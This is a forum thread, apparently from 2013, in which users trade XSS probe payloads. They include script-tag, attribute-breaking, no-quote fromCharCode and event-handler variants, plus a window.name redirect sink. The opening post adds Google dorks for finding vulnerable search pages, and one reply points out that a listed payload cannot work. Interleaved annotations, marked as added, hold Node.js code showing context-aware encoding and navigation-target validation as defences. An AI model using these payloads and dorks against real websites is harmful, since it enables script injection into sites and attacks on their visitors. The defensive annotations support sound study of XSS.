io.kent Posted July 14, 2013 (edited)

For the curious ones who keep searching, there are several XSS search methods; I'll leave them here. Simple and known to most:

<script>alert("XSS")</script>

Or

>script>alert( > XSS DETECTED < )</script>

and now a few less-known methods...

String.fromCharCode(88,83,83)
<script>alert(String.fromCharCode(88,83,83))</script>
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))
onmouseover=alert("XSS")
<script>alert(String.fromCharCode(88,83,83))</script>

allowed characters..

> = %3c
< = %3c
/ = %2f

a few XSS dorks

inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx

Edit// some help here; I won't give details, you'll figure out what it's good for!
http://www.wocares.com/noquote.php
m1dst1k Posted July 14, 2013

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
'>//\\,<'>">">"*"
'); alert('XSS
<script>alert(1);</script>
<script>alert('XSS');</script>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
'></select><script>alert(123)</script>
<IMG SRC=javascript:alert("XSS")>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<scrscriptipt>alert(1)</scrscriptipt>
<img src=foo.png onerror=alert(/xssed/) />
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<input type="text" AUTOFOCUS onfocus=alert(1)>

Since you opened this topic, I've added a few of mine as well.
eusimplu Posted July 14, 2013 (edited)

> >script>alert( > XSS DETECTED < )</script>

This can't possibly work. And you forgot about regex for the case where quotes (" and/or ') can't be entered.
dekeeu Posted July 14, 2013

> This can't possibly work.

Maybe; it depends on the filter.
eusimplu Posted July 14, 2013

> Maybe; it depends on the filter.

What filter? It makes no sense from the point of view of JavaScript, nor of HTML! Open the console and enter:

alert( > XSS DETECTED < )

Strings in JavaScript (and in many other languages) are delimited by quotes (' or "), the exception in JavaScript being the / character used for regular expressions. Make an HTML file and put in:

>script>alert( > XSS DETECTED < )</script>

Tags are opened with <> not with <<, and it makes no sense for XSS either: > is used to close the tag, so why the hell isn't it also used to open it?
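The payload lists in the first two posts and the quote-filter point raised in the replies, as an added example that is not part of any post above. It reflects a sample of the thread's payloads into three injection contexts of a hypothetical page (HTML body, double-quoted attribute, double-quoted JavaScript string), once by plain concatenation and once with context-specific output encoding, and runs the resulting <script> elements under Node.js with a stub alert() that records its argument instead of opening a dialog. The page, the contexts and the helper names are assumptions made for this example; the payloads are the ones quoted above.

```javascript
// Added example (not from the thread): the payloads above reflected into three
// injection contexts, once by naive concatenation and once with context-aware
// output encoding. Runs under Node.js. The <script> elements of each rendered
// snippet are really executed, with a stub alert() that records its argument
// instead of opening a dialog, so we see which payload fires in which context.

// Constructed sample set, quoted from the posts above.
const PAYLOADS = {
  tag:        '<script>alert("XSS")</script>',
  tagNoQuote: '<script>alert(String.fromCharCode(88,83,83))</script>',
  attrBreak:  '"><script>alert(String.fromCharCode(88,83,83))</script>',
  closeFirst: '</script><script>alert("XSS")</script>',
  dqString:   '";alert("XSS");"',
  sqString:   "';alert(String.fromCharCode(88,83,83))//",
  handler:    'onmouseover=alert("XSS")',
};

// HTML entity encoding for text nodes and quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// JavaScript string literal: JSON.stringify escapes quotes and backslashes;
// < > & and the U+2028/2029 line terminators are additionally \u-escaped so the
// literal can neither open a tag nor terminate the enclosing <script>.
function jsStringLiteral(s) {
  return JSON.stringify(String(s)).replace(/[<>&\u2028\u2029]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// A naive "filter" of the kind the thread argues about: strip both quote chars.
function stripQuotes(s) {
  return String(s).replace(/["']/g, '');
}

// Three reflection points of a hypothetical page, vulnerable and encoded forms.
const CONTEXTS = {
  body:   { vuln: q => `<p>Results for ${q}</p>`,
            safe: q => `<p>Results for ${escapeHtml(q)}</p>` },
  attr:   { vuln: q => `<input value="${q}">`,
            safe: q => `<input value="${escapeHtml(q)}">` },
  script: { vuln: q => `<script>var q = "${q}";</script>`,
            safe: q => `<script>var q = ${jsStringLiteral(q)};</script>` },
};

// Execute every <script> element in a rendered snippet, as a browser would:
// a broken script is skipped (its error class is recorded) and later ones run.
function runScripts(html) {
  const alerts = [], errors = [];
  for (const [, code] of html.matchAll(/<script>([\s\S]*?)<\/script>/g)) {
    try { new Function('alert', code)(msg => alerts.push(String(msg))); }
    catch (e) { errors.push(e.constructor.name); }
  }
  return { alerts, errors };
}

// Nothing executes in the attribute context, so check structurally: did the
// payload add a '<' (a new tag) or a '"' (left the quoted value) beyond what
// the template renders for empty input?
function escapesAttribute(rendered) {
  const baseline = CONTEXTS.attr.vuln('');
  const count = (s, c) => s.split(c).length - 1;
  return count(rendered, '<') !== count(baseline, '<')
      || count(rendered, '"') !== count(baseline, '"');
}

// Does `payload` reach script execution (or escape the attribute) in `ctx`?
function fires(ctx, mode, payload) {
  const html = CONTEXTS[ctx][mode](payload);
  return ctx === 'attr' ? escapesAttribute(html)
                        : runScripts(html).alerts.length > 0;
}

// What characters such as < > / look like once the browser URL-encodes them.
function urlEncoded(s) {
  return encodeURIComponent(s);
}

// One row per payload: vulnerable vs. encoded result for every context.
function summary(payloads = PAYLOADS) {
  const rows = {};
  for (const [name, p] of Object.entries(payloads)) {
    rows[name] = {};
    for (const ctx of Object.keys(CONTEXTS)) {
      rows[name][ctx] = { vuln: fires(ctx, 'vuln', p), safe: fires(ctx, 'safe', p) };
    }
  }
  return rows;
}

for (const [name, row] of Object.entries(summary())) {
  const cells = Object.entries(row).map(([c, v]) => `${c}=${v.vuln}/${v.safe}`);
  console.log(name.padEnd(11), cells.join('  '));
}
console.log('quote-stripped, body context: tag ->',
  fires('body', 'vuln', stripQuotes(PAYLOADS.tag)), ' tagNoQuote ->',
  fires('body', 'vuln', stripQuotes(PAYLOADS.tagNoQuote)));
console.log('URL form of <>/ :', urlEncoded('<>/'));
```

Two things the table makes visible that the raw lists do not: a payload only fires in the context whose delimiter it closes (the single-quote variant is inert inside a double-quoted string, and `</script><script>...` is the one that survives a script context because the HTML parser ends the element before the JavaScript parser ever sees the broken literal), and stripping quotes defeats `alert("XSS")` in the body context but not `alert(String.fromCharCode(88,83,83))`, which is exactly why the no-quote variants are in the list. Entity encoding for HTML and a \u-escaped string literal for script neutralise every row.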
Domnul.Do Posted July 14, 2013

Or my favourite (a bit more advanced, it has more to do with DOM Clobbering):

<script>document.location=window.name</script>

(the tag is up to you)

P.o.C: http://jsfiddle.net/gLwCM/
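The `document.location = window.name` sink from the post, as an added example that is neither the post's code nor the linked fiddle. A browsing context opened with `window.open(url, name)` or targeted by `<a target="name">` has its `window.name` set by whoever opened it, so a page that navigates to `window.name` goes wherever the opener chose, including a `javascript:` URL that then runs in the page's own origin. The simulation below runs under Node.js with a fake `window` object; the origin `https://example.test`, the opener payload and the `safeNavigationTarget` allowlisting helper are assumptions made for this example.

```javascript
// Added example (not from the post): a Node.js simulation of the window.name
// sink. The fake window object, the origin and the hardening helper are
// assumptions for this example; in a browser the victim page would simply
// contain the one-liner from the post.

const SITE_ORIGIN = 'https://example.test';   // assumed origin of the victim page

// Opener side: window.open(victimUrl, payload) yields a browsing context whose
// window.name is the payload by the time the victim page loads in it.
function openWindow(victimUrl, name) {
  return { location: victimUrl, name };
}

// Vulnerable page logic, as in the post: navigate to whatever window.name holds.
// Returns the URL the browser would navigate to.
function victimVulnerable(win) {
  win.location = win.name;
  return win.location;
}

// Hardened: accept only same-origin http(s) targets and hand back a relative
// path. One origin comparison refuses javascript:, data:, //evil.test,
// absolute cross-origin URLs and scheme downgrades in one go.
function safeNavigationTarget(untrusted, origin = SITE_ORIGIN) {
  if (typeof untrusted !== 'string' || untrusted.length === 0 || untrusted.length > 2048) {
    return null;
  }
  let url;
  try { url = new URL(untrusted, origin); } catch { return null; }
  // javascript: and data: URLs have origin "null"; "//host" and absolute URLs
  // resolve to another origin; the WHATWG parser treats backslashes like
  // slashes for http(s), so "/\evil.test" also resolves cross-origin.
  if (url.origin !== origin) return null;
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return null;
  return url.pathname + url.search + url.hash;
}

function victimHardened(win, fallback = '/') {
  win.location = safeNavigationTarget(win.name) ?? fallback;
  return win.location;
}

// Constructed opener payloads for the simulation.
const PAYLOAD = 'javascript:alert(document.domain)';
const BENIGN  = '/dashboard?tab=1#top';

console.log('vulnerable page navigates to:',
  victimVulnerable(openWindow(SITE_ORIGIN + '/page', PAYLOAD)));
console.log('hardened page navigates to:  ',
  victimHardened(openWindow(SITE_ORIGIN + '/page', PAYLOAD)));
console.log('hardened page, benign name:  ',
  victimHardened(openWindow(SITE_ORIGIN + '/page', BENIGN)));
```

The check deliberately does not try to blocklist `javascript:` by string matching: leading whitespace, mixed case and backslash tricks are all normalised away by the URL parser, which is why the comparison is done on `url.origin` of the parsed result rather than on the raw string. A Content-Security-Policy without `'unsafe-inline'` would also block the `javascript:` navigation, but the sink itself stays an open redirect until the value is validated.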